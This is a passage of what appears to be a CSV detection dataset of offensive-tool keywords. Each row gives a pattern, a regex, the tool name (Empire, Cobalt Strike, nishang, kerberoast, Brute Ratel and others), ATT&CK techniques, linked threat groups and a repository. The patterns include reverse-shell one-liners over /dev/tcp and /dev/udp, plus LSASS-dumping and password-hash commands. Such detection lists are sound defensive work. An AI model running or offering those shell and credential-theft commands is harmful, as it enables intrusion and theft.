T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Set-RemotePSRemoting*",".{0,1000}Set\-RemotePSRemoting.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Set-RemotePSRemoting.ps1*",".{0,1000}Set\-RemotePSRemoting\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Set-RemoteShellAccess.ps1*",".{0,1000}Set\-RemoteShellAccess\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Set-RemoteWMI.ps1*",".{0,1000}Set\-RemoteWMI\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Set-RemoteWMI.ps1*",".{0,1000}Set\-RemoteWMI\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Set-SamAccountPasswordHash * -NTHash *",".{0,1000}Set\-SamAccountPasswordHash\s.{0,1000}\s\-NTHash\s.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Set-ServiceBinPath*",".{0,1000}Set\-ServiceBinPath.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*set-shellcode-process default*",".{0,1000}set\-shellcode\-process\sdefault.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*setspn -A HTTP/*",".{0,1000}setspn\s\-A\sHTTP\/.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential 
Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*setspn -T medin -Q */*",".{0,1000}setspn\s\-T\smedin\s\-Q\s.{0,1000}\/.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*setspn.exe -T medin -Q */*",".{0,1000}setspn\.exe\s\-T\smedin\s\-Q\s.{0,1000}\/.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*SetStatusCheckIn updates the last time the Agent successfully communicated with the Merlin server*",".{0,1000}SetStatusCheckIn\supdates\sthe\slast\stime\sthe\sAgent\ssuccessfully\scommunicated\swith\sthe\sMerlin\sserver.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*setthreadcontext.x64*",".{0,1000}setthreadcontext\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*setthreadcontext.x86*",".{0,1000}setthreadcontext\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*Setting up GFlags & SilentProcessExit settings in registry?*",".{0,1000}Setting\sup\sGFlags\s\&\sSilentProcessExit\ssettings\sin\sregistry\?.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*setuid_setgid.py*",".{0,1000}setuid_setgid\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*setup_apfell.sh*",".{0,1000}setup_apfell\.sh.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*setup_obfuscate_xor_key*",".{0,1000}setup_obfuscate_xor_key.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*setup_reflective_loader*",".{0,1000}setup_reflective_loader.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Set-WMIBackdoor -URL *",".{0,1000}Set\-WMIBackdoor\s\-URL\s.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","create or remove a backdoor using WMI event subscriptions","T1546.003 - T1059.001 - T1102","TA0005 - TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/xorrior/RandomPS-Scripts","1","0","N/A","10","4","313","89","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z" "*Set-WorkingHours*",".{0,1000}Set\-WorkingHours.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*seventeenman/CallBackDump*",".{0,1000}seventeenman\/CallBackDump.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","531","75","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*sfp_portscan_tcp.py*",".{0,1000}sfp_portscan_tcp\.py.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*sfp_torexits.py*",".{0,1000}sfp_torexits\.py.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*sh -c *ping -c 2 %s grep %s /proc/net/arp >/tmp/gx *",".{0,1000}sh\s\-c\s.{0,1000}ping\s\-c\s2\s\%s\s\sgrep\s\%s\s\/proc\/net\/arp\s\>\/tmp\/gx\s.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*sh -i >& /dev/tcp/*/* 0>&1*",".{0,1000}sh\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sh -i >& /dev/udp/*/* 0>&1*",".{0,1000}sh\s\-i\s\>\&\s\/dev\/udp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sh -i 5<> /dev/tcp/*/* 0<&5 1>&5 2>&5*",".{0,1000}sh\s\-i\s5\<\>\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\<\&5\s1\>\&5\s2\>\&5.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Sha-2-*512.unverified.test-vectors.txt*",".{0,1000}Sha\-2\-.{0,1000}512\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Sha-2-256.unverified.test-vectors.txt*",".{0,1000}Sha\-2\-256\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Sha-2-384.unverified.test-vectors.txt*",".{0,1000}Sha\-2\-384\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*shadawck/glit*",".{0,1000}shadawck\/glit.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*shadawck/recon-archy*",".{0,1000}shadawck\/recon\-archy.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","15","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" "*shadow_copy.rb*",".{0,1000}shadow_copy\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*shadow1ng/fscan*",".{0,1000}shadow1ng\/fscan.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*shadowclock*",".{0,1000}shadowclock.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shadowclone *",".{0,1000}shadowclone\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shadowcoerce.py *",".{0,1000}shadowcoerce\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment 
with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*shadowcoerce_check*",".{0,1000}shadowcoerce_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*shadowcopy enum*",".{0,1000}shadowcopy\senum.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*shadowdump.*",".{0,1000}shadowdump\..{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" 
"*ShadowForge.py*",".{0,1000}ShadowForge\.py.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*ShadowForgeC2-main*",".{0,1000}ShadowForgeC2\-main.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*ShadowSpray recovered*",".{0,1000}ShadowSpray\srecovered.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*ShadowSpray.Asn1*",".{0,1000}ShadowSpray\.Asn1.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*ShadowSpray.DSInternals*",".{0,1000}ShadowSpray\.DSInternals.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
